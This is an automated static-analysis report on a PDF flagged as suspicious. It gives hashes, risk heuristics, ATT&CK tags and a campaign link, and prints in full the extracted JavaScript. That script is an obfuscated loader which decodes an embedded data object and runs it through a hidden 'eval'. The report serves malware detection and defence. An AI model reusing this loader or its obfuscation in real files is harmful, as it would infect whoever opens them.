PDF static analysis report

Static analysis result for SHA-256 888ee58f9d0d2183…

SUSPICIOUS

PDF

1.4 KB First seen: 2026-05-09
MD5: f01f2b729b6f3f384f4ed76a9cd6b722 SHA-1: 8dcd3777c5aeb639312b47a517b66d1c8b94043b SHA-256: 888ee58f9d0d2183f3d91efd69aed9f2a2849aeb4fa18ffd6c2c6c1350a52ed2
54 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript which is obfuscated but appears to reconstruct the string 'eval' and then call it with content derived from an embedded data object named 'xampp'. This suggests the script is intended to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign: shared payload 1bc4bf38a7 55 samples

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x1CC 254 bytes
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6
Preview script
First 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){   rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd);        rf=re.one.value+re.two.value;this[rf](rc);